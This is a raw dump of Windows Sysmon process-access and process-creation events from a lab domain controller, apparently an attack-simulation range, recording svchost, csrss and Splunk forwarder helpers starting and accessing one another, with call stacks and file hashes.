15:54:14.487{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006557Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:14.487{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006556Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:14.487{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006555Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:14.487{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7D26-5FA1-6B01-000000008801}2212C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006554Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:14.487{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7D26-5FA1-6B01-000000008801}2212C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006553Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:14.487{D28789B6-7D26-5FA1-6B01-000000008801}2212C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006580Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:15.222{D28789B6-7D27-5FA1-6C01-000000008801}31842312C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006579Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:15.081{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7D27-5FA1-6C01-000000008801}3184C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006578Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:15.081{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006577Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:15.081{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006576Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:15.081{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006575Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:15.081{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006574Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:15.081{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006573Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:15.081{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006572Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:15.081{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006571Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:15.081{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006570Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:15.081{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006569Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:15.081{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7D27-5FA1-6C01-000000008801}3184C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006568Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:15.081{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7D27-5FA1-6C01-000000008801}3184C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006567Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:15.083{D28789B6-7D27-5FA1-6C01-000000008801}3184C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006593Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:16.426{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7D28-5FA1-6D01-000000008801}4300C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006592Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:16.426{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006591Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:16.426{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006590Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:16.426{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006589Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:16.426{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006588Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:16.426{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006587Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:54:16.426{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 